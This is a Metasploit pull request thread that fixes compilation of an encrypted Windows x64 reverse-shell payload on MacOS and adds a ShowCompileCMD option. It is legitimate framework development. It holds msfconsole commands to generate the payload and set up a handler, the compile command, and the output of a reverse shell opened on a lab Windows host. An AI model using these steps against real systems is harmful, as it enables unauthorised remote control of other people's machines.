Fix Compiling Encrypted Payloads on MacOS

[space-r7]

Description

Generating an encrypted payload on MacOS will result in an error:

msf6 > use payload/windows/x64/encrypted_shell/reverse_tcp
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > generate -f exe LHOST=192.168.140.1
[-] Payload generation failed: Payload did not compile. Check the logs for further information.
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > log
...
[09/23/2021 15:19:17] [e(0)] core: /usr/local/Cellar/mingw-w64/9.0.0_2/toolchain-x86_64/bin/x86_64-w64-mingw32-ld: /var/folders/j3/_jj69l4d1k3_jsxkb44qj0d00000gq/T/reverse_pic_stager20210923-36761-xw7bgl.exe:.text: section below image base

This adds a linker option to pin the image base to 0x0 to ensure that compilation doesn't error out. This also adds an advanced option, ShowCompileCMD, that will print the compilation command used.

Verification

• Generate an encrypted payload either through msfconsole or msfvenom on MacOS
• Run the payload on a Windows target

[jheysel-r7]

Thanks for the great PR @space-r7! I've reviewed the changes and don't see any need for improvements. Testing results were as expected:

msf6 > use payload/windows/x64/encrypted_shell/reverse_tcp
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set ShowCompileCMD true
ShowCompileCMD => true
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > generate -f exe LHOST=192.168.123.1 LPORT=4444 -o shell.exe
x86_64-w64-mingw32-gcc /var/folders/l7/f3z1n8_53bn3hypxjrh0278h0000gn/T/reverse_pic_stager20210927-20452-3rzj58.c -I /Users/jheysel/rapid7/metasploit-framework/data/headers/windows/c_payload_util -o /var/folders/l7/f3z1n8_53bn3hypxjrh0278h0000gn/T/reverse_pic_stager20210927-20452-3rzj58.exe -ffunction-sections -fno-asynchronous-unwind-tables -fno-ident -O2 -nostdlib -Wl,--image-base=0x0,--no-seh,-s,-T/Users/jheysel/rapid7/metasploit-framework/data/utilities/encrypted_payload/func_order64.ld
[*] Writing 9216 bytes to shell.exe...


Drop shell on Window’s host, setup handler and execute:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/x64/encrypted_shell/reverse_tcp
payload => windows/x64/encrypted_shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.123.1
LHOST => 192.168.123.1

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Sending stage (3584 bytes) to 192.168.123.130
[*] Encrypted reverse shell session 1 opened (192.168.123.1:4444 -> 192.168.123.130:49719) at 2021-09-27 13:13:07 -0400


C:\Users\Administrator\Desktop>whoami
whoami
desktop-13bfu78\administrator

C:\Users\Administrator\Desktop>systeminfo
systeminfo


Host Name:                 DESKTOP-13BFU78
OS Name:                   Microsoft Windows 10 Education
OS Version:                10.0.19041 N/A Build 19041
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
...

[space-r7]

Thanks so much for landing!

[erran-r7]

Release Notes

Updates payload/windows/x64/encrypted_shell/reverse_tcp to no longer crash on MacOS. Additionally adds an advanced option, ShowCompileCMD, that prints the compilation command used.